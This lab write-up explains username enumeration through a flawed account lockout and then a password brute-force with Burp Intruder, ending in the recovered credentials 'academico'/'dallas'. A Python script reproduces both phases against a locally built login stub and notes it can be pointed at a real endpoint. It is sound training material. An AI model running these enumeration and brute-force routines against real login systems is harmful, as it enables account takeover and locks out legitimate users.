Username enumeration via account lock

In this lab we exploit a logic flaw in the account-lockout mechanism. As in the previous labs, we first enumerate a valid username and then brute-force its password.

To solve this lab we follow the same process as before: intercept the login request with Burp Suite and send it to Intruder. This time we need each username to be submitted 5 times in a row, then observe which username returns a longer response. The flaw is that the lockout counter is only kept for accounts that actually exist, so only a valid username ever triggers the lockout message; invalid usernames keep returning the generic error no matter how many attempts we make.

Before launching the attack, to make sure every username is repeated 5 times, we add an arbitrary extra parameter to the end of the request and mark its value as a second payload position. The first payload set is the username wordlist; the second set is five throwaway values for the dummy parameter (Null payloads work fine). We use the Cluster bomb attack type so Intruder iterates through every combination of the two sets, which gives each username five consecutive login attempts.

Once the attack finishes, the username "academico" stands out with a different response length: instead of "Invalid username or password", it returns a different error message indicating that the account has been locked.

Now that we have a candidate username, we run a Sniper attack against it with the password wordlist. As in a previous lab, we add a Grep - Extract rule for the error message so the correct password is easy to spot: its response will have nothing for the rule to extract.

In this attack every password returned the same error except "dallas", which turned out to be the correct password for the username "academico". Because the account is locked by our own attempts, we wait for the lock to expire before logging in with these credentials to solve the lab.
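The two Intruder phases above, reproduced in plain Python as an added example (this is not code from the lab or the original write-up). The login endpoint is a constructed stand-in that has the same logic flaw as the lab: its failure counter only exists for real accounts, so only a valid username can ever trigger the lockout message. The HTML layout, the lockout wording, the wordlists and the `send` callable are all assumptions; against a real target you would replace `VulnerableLogin.login` with a function that POSTs the credentials and returns the response body.

```python
import re
from collections import Counter
from typing import Callable, Dict, List, Optional

GENERIC_ERROR = "Invalid username or password."
LOCKOUT_ERROR = "Too many incorrect login attempts. Try again later."  # assumed wording
MAX_FAILURES = 5  # bad logins before the lock kicks in (why the lab repeats each username 5 times)

# The lab's warning paragraph is assumed to look like this; adjust the regex for a real target.
WARNING_RE = re.compile(r'<p class="is-warning">(.*?)</p>')

# A function that submits one login attempt and returns the response body.
Sender = Callable[[str, str], str]


class VulnerableLogin:
    """Constructed stand-in for the lab's login endpoint.

    Flaw: the failure counter is only kept for accounts that exist, so an invalid
    username always gets the generic error while a valid one gets the lockout
    message after MAX_FAILURES bad attempts.  The password check runs before the
    lock check, so the right password returns a page with no error at all, which
    is the difference the Grep - Extract rule picks up in the second phase.
    """

    def __init__(self, accounts: Dict[str, str]):
        self.accounts = accounts
        self.failures: Counter = Counter()

    def login(self, username: str, password: str) -> str:
        if username not in self.accounts:
            return self._page(GENERIC_ERROR)  # no counter, so never locks
        if self.accounts[username] == password:
            return self._page(None)  # success page: no warning paragraph
        self.failures[username] += 1
        if self.failures[username] >= MAX_FAILURES:
            return self._page(LOCKOUT_ERROR)
        return self._page(GENERIC_ERROR)

    @staticmethod
    def _page(error: Optional[str]) -> str:
        body = "<html><body><form action=/login method=POST></form>"
        if error:
            body += f'<p class="is-warning">{error}</p>'
        return body + "</body></html>"


def extract_error(body: str) -> str:
    """Equivalent of the Grep - Extract rule: the warning text, or '' if absent."""
    match = WARNING_RE.search(body)
    return match.group(1) if match else ""


def enumerate_usernames(send: Sender, usernames: List[str],
                        repeats: int = MAX_FAILURES,
                        bad_password: str = "definitely-not-the-password") -> List[str]:
    """Cluster-bomb phase: submit every username `repeats` times with a wrong
    password and flag the ones whose final response differs from the majority."""
    final_error: Dict[str, str] = {}
    for user in usernames:
        for _ in range(repeats):
            final_error[user] = extract_error(send(user, bad_password))
    baseline = Counter(final_error.values()).most_common(1)[0][0]
    return [u for u, err in final_error.items() if err != baseline]


def brute_force_password(send: Sender, username: str, passwords: List[str]) -> Optional[str]:
    """Sniper phase: the password whose response has nothing for the rule to extract."""
    for password in passwords:
        if extract_error(send(username, password)) == "":
            return password
    return None


def run_demo():
    """Constructed wordlists against the constructed endpoint; returns (candidates, password)."""
    server = VulnerableLogin({"academico": "dallas", "wiener": "peter"})
    usernames = ["admin", "root", "academico", "guest", "test"]
    passwords = ["123456", "password", "dallas", "letmein"]
    candidates = enumerate_usernames(server.login, usernames)
    found = brute_force_password(server.login, candidates[0], passwords) if candidates else None
    return candidates, found


if __name__ == "__main__":
    print(run_demo())  # ([ 'academico' ], 'dallas') for the constructed data
```

Flagging on the extracted message rather than on raw content length is slightly more robust than sorting Intruder results by Length, since a dynamic page can vary in size for unrelated reasons; in the lab both signals point at the same username. Note that `enumerate_usernames` deliberately locks every valid account it finds, which is exactly why the write-up has to wait for the lock to expire before logging in.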
